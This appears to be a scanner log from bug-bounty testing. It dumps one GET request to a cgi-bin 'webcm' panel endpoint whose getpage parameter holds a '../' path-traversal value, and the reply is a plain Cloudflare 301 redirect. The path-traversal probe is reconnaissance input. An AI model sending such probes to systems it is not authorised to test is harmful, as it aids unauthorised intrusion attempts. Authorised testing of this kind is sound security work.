[quest-panel] Dumped HTTP request for http://web.bitpanda.com/cgi-bin/webcm?getpage=../html/login.html


GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1
Host: web.bitpanda.com
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
X-Bug-Bounty: Bugcrowd-eno@bugcrowdninja.com
Accept-Encoding: gzip


[quest-panel] Dumped HTTP response http://web.bitpanda.com/cgi-bin/webcm?getpage=../html/login.html

HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 167
Cache-Control: max-age=3600
Cf-Ray: 96a670400b9ad678-IAD
Content-Type: text/html
Date: Tue, 05 Aug 2025 12:53:37 GMT
Expires: Tue, 05 Aug 2025 13:53:37 GMT
Location: https://web.bitpanda.com/cgi-bin/webcm?getpage=../html/login.html
Server: cloudflare
Vary: Accept-Encoding
X-Content-Type-Options: nosniff

<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>cloudflare</center>
</body>
</html>

